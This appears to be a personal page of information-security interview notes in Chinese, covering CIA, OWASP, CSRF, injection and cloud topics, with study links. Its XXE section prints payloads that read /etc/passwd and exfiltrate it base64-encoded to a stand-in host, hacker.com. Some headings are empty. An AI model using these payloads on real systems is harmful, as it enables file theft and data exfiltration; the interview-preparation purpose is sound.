本页是我所经历过的面试总结,涵盖了相当广泛的岗位,虽然也收到过多次拒绝,但我从每次面试中学习,收集建设性反馈,并继续前进。 希望这些问题/技巧能对你有所帮助。
它通常涵盖以下岗位:
快速提示:
我试着把下面所有遇到过的问题都记了下来,并为少数问题提供了答案。 其余问题你可以自己谷歌查找具体答案,如果你想深入钻研的话。此外,文末还有一些参考资料,可以去看看。那些真的很有帮助。
随着我不断前进并翻看笔记,我会很乐意添加更多问题,但如果你能通过 [email protected] 联系我,给我一些建设性反馈,我会非常感激。 如果你遇到了这里没有涵盖的内容,请随时分享。
什么是 CIA?
什么是 AAA?
OWASP Top 10
什么是 XSS(跨站脚本攻击)
什么是 CSRF
这是每个面试官都爱问的“甜心”问题
快速提示: 回答要简洁,如果被追问再解释完整原理
跨站请求伪造(CSRF)是一种攻击,迫使已通过身份验证的终端用户在当前登录的 Web 应用中执行非自愿的操作。CSRF 攻击专门针对会改变状态的请求,而非窃取数据,因为攻击者无法看到伪造请求的响应。借助一点社会工程学手段(例如通过电子邮件或聊天发送链接),攻击者可以欺骗 Web 应用的用户执行攻击者所选择的操作。如果受害者是普通用户,成功的 CSRF 攻击可以迫使用户执行改变状态的请求,例如转账、更改电子邮件地址等。如果受害者是管理账户,CSRF 可能会危及整个 Web 应用。
如何防御 CSRF:
使用反 CSRF 令牌
使用同源策略
使用 Referrer 头
什么是 HTML / URL 编码
HTTP 协议是无状态的吗?
HTTP 本质上是一种无状态协议,但服务器使用 Cookie 使其变得有状态
注入攻击有哪些类型:SQL、命令、操作系统
如何防御 SQL 注入
使用参数化查询和存储过程
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>
注入目标:document.xml
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://hacker.com/evil.dtd">
%remote; %intern; %xxe;
]>
<root>&xxe;</root> - you can change xxe entity to general entity
外部主机:http://hacker.com/evil.dtd
<!ENTITY % payl SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
<!ENTITY % intern "<!ENTITY % xxe SYSTEM 'http://hacker.com/result-is?%payl;'>">
--- OR ---
<!ENTITY % intern "<!ENTITY % xxe SYSTEM 'file://%payl;'>"> - consider error-based
参考:[https://phonexicum.github.io/infosec/xxe.html]
这里将主要以 AWS 为例进行讨论,不过还有其他云服务提供商,如 Azure、GCP、Digital Ocean 等。
学习资源:
https://regexone.com/ (正则表达式是必须的!)
https://portswigger.net/web-security/
OWASP Top 10:
https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf
信息安全面试问题:
https://danielmiessler.com/study/infosec_interview_questions
顶级渗透测试问题:
https://resources.infosecinstitute.com/top-30-penetration-tester-pentester-interview-questions-and-answers-for-2019/#gref
Python 技巧:
https://www.codementor.io/sheena/essential-python-interview-questions-du107ozr6
AWS 用户指南:
https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/concepts.html
SMB 和 Samba 见解:
https://fitzcarraldoblog.wordpress.com/2016/10/17/a-correct-method-of-configuring-samba-for-browsing-smb-shares-in-a-home-network/